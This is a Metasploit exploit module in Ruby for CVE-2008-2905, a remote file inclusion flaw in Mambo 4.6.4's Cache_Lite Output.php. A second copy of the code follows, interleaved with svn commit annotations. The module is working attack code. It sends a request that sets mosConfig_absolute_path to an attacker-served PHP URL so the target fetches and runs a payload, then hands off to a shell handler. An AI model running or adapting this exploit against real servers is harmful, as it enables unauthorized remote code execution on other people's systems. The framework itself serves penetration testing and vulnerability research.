metasploit-framework/modules/exploits/unix/webapp/mambo_cache_lite.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::HttpServer::PHPInclude

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include',
			'Description'    => %q{
					This module exploits a remote file inclusion vulnerability in
				includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo
				4.6.4 and earlier.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2008-2905' ],
					[ 'OSVDB', '46173' ],
					[ 'BID', '29716' ],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Compat'      =>
						{
							'ConnectionType' => 'find',
						},
					'Space'       => 32768,
				},
			'Platform'       => 'php',
			'Arch'           => ARCH_PHP,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Jun 14 2008',
			'DefaultTarget' => 0))

		register_options(
			[
				OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/includes/Cache/Lite/Output.php?mosConfig_absolute_path=!URL!"]),
			], self.class)
	end

	def php_exploit

		timeout = 0.01
		uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
		print_status("Trying uri #{uri}")

		response = send_request_raw( {
				'global' => true,
				'uri' => uri,
			},timeout)

		if response and response.code != 200
			print_error("Server returned non-200 status code (#{response.code})")
		end

		handler
	end

end
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00			`##`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`# $Id$`
			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
Mass RE-update: fix all framework URL references git-svn-id: file:///home/svn/framework3/trunk@10998 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-11 22:43:22 +00:00			`# http://metasploit.com/framework/`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! git-svn-id: file:///home/svn/framework3/trunk@7724 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-06 05:50:37 +00:00			`Rank = ExcellentRanking`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00
			`include Msf::Exploit::Remote::Tcp`
			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Exploit::Remote::HttpServer::PHPInclude`

			`def initialize(info = {})`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`super(update_info(info,`
fix some more titles with periods git-svn-id: file:///home/svn/framework3/trunk@11127 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-24 19:35:38 +00:00			`'Name' => 'Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include',`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00			`'Description' => %q{`
			`This module exploits a remote file inclusion vulnerability in`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo`
			`4.6.4 and earlier.`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00			`},`
			`'Author' => [ 'MC' ],`
			`'License' => MSF_LICENSE,`
			`'Version' => '$Revision$',`
			`'References' =>`
			`[`
			`[ 'CVE', '2008-2905' ],`
added refs. I think all the auxiliary and exploit modules should now be covered. git-svn-id: file:///home/svn/framework3/trunk@9298 4d416f70-5f16-0410-b530-b9f4589650da 2010-05-13 16:53:50 +00:00			`[ 'OSVDB', '46173' ],`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00			`[ 'BID', '29716' ],`
			`],`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'DisableNops' => true,`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`'Compat' =>`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00			`{`
			`'ConnectionType' => 'find',`
			`},`
			`'Space' => 32768,`
			`},`
			`'Platform' => 'php',`
			`'Arch' => ARCH_PHP,`
			`'Targets' => [[ 'Automatic', { }]],`
			`'DisclosureDate' => 'Jun 14 2008',`
			`'DefaultTarget' => 0))`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
			`register_options(`
			`[`
			`OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/includes/Cache/Lite/Output.php?mosConfig_absolute_path=!URL!"]),`
			`], self.class)`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00			`end`

			`def php_exploit`

			`timeout = 0.01`
			`uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))`
			`print_status("Trying uri #{uri}")`

			`response = send_request_raw( {`
			`'global' => true,`
			`'uri' => uri,`
			`},timeout)`

			`if response and response.code != 200`
			`print_error("Server returned non-200 status code (#{response.code})")`
			`end`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00			`handler`
			`end`

			`end`